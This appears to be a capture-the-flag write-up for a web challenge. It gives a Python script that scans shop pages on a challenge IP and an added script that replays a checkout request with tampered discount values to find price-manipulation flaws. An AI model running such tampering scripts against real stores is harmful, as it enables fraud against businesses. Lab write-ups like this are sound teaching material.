BUUCTF writeup: ikun_bilibili fan club (JWT forgery, Python deserialization)
1. Finding the page that lists the lv6 account
import requests

target = "http://111.200.241.244:61777/shop?page=%d"

for i in range(500):
    print(i)
    res = requests.get(target % i).text   # fetch one page of the shop listing
    if "lv6.png" in res:                  # the lv6 item is rendered with this image
        print(target % i)
        break

Output:
http://111.200.241.244:61777/shop?page=181
2. Capturing the checkout request
Only changing the discount parameter has any effect; the request then redirects to http://111.200.241.244:61777
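As an added example (not code from the original writeup), one way to check the discount parameter systematically once the checkout request has been captured: replay the captured form once per candidate discount value and keep the values whose response differs from the unmodified baseline. The checkout path `/buy`, the sample form `{"discount": "0.8"}` and the cookie placeholder are assumptions for illustration; take the real path, fields and session cookie from the captured request.

```python
BASE = "http://111.200.241.244:61777"


def tamper_discount(form, discount):
    """Copy the captured checkout form with only the discount field replaced."""
    data = dict(form)
    data["discount"] = str(discount)
    return data


def probe_discount(send, form, candidates):
    """Replay the checkout form once per candidate discount value.

    `send(data)` performs the POST and returns (status_code, body_text).
    Returns (value, status_code) for every candidate whose response differs
    from the baseline (the unmodified form): the signal that the server
    trusts the client-supplied discount instead of recomputing it.
    """
    baseline = send(dict(form))
    hits = []
    for value in candidates:
        resp = send(tamper_discount(form, value))
        if resp != baseline:
            hits.append((value, resp[0]))
    return hits


def make_sender(session, path):
    """Build a `send` callable that POSTs to BASE + path without following
    redirects, so a 302 to the shop root stays visible as the outcome.
    `path` is whatever the captured checkout request was sent to (assumed)."""
    import requests  # imported here so the offline helpers above do not need it

    def send(data):
        r = session.post(BASE + path, data=data, allow_redirects=False)
        return r.status_code, r.text
    return send


if __name__ == "__main__":
    import requests

    s = requests.Session()
    # Placeholders: paste the session cookie and the full form from the capture.
    s.cookies.set("session", "<captured cookie>")
    captured = {"discount": "0.8"}          # constructed sample form
    send = make_sender(s, "/buy")           # hypothetical checkout path
    for value, status in probe_discount(send, captured, ["0.5", "0.00001", "0", "-1"]):
        print(f"discount={value!r} changed the response (status {status})")
```

Because `probe_discount` only depends on the injected `send` callable, the same logic can be exercised offline against a stub server before pointing it at the target.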